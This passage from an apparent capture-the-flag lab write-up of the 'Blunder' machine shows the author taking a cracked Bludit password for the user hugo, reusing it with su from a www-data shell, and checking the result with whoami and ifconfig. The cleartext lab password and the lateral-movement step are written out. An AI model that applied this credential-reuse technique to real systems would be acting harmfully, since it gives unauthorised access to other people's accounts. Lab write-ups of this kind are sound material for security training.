hugo
I have retrieved and cracked the password of the hugo
user for the newer instance of the web application.
While the password is for the web application, I will test it out against the system for password reuse
www-data@blunder:/var/www/bludit-3.10.0a/bl-content/databases$ su hugo
password: Password120
hugo@blunder:/var/www/bludit-3.10.0a/bl-content/databases$ whoami
hugo
hugo@blunder:/var/www/bludit-3.10.0a/bl-content/databases$ hostname
blunder
hugo@blunder:/var/www/bludit-3.10.0a/bl-content/databases$ ifconfig
ens160: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 10.10.10.191 netmask 255.255.255.0 broadcast 10.10.10.255
inet6 dead:beef::250:56ff:feb9:30a prefixlen 64 scopeid 0x0<global>
inet6 fe80::250:56ff:feb9:30a prefixlen 64 scopeid 0x20<link>
ether 00:50:56:b9:03:0a txqueuelen 1000 (Ethernet)
RX packets 4701975 bytes 400569473 (400.5 MB)
RX errors 0 dropped 81 overruns 0 frame 0
TX packets 3603771 bytes 2474983263 (2.4 GB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 21890 bytes 1987326 (1.9 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 21890 bytes 1987326 (1.9 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
Password reuse confirmed for the hugo
user
Lateral Movement made to the hugo
user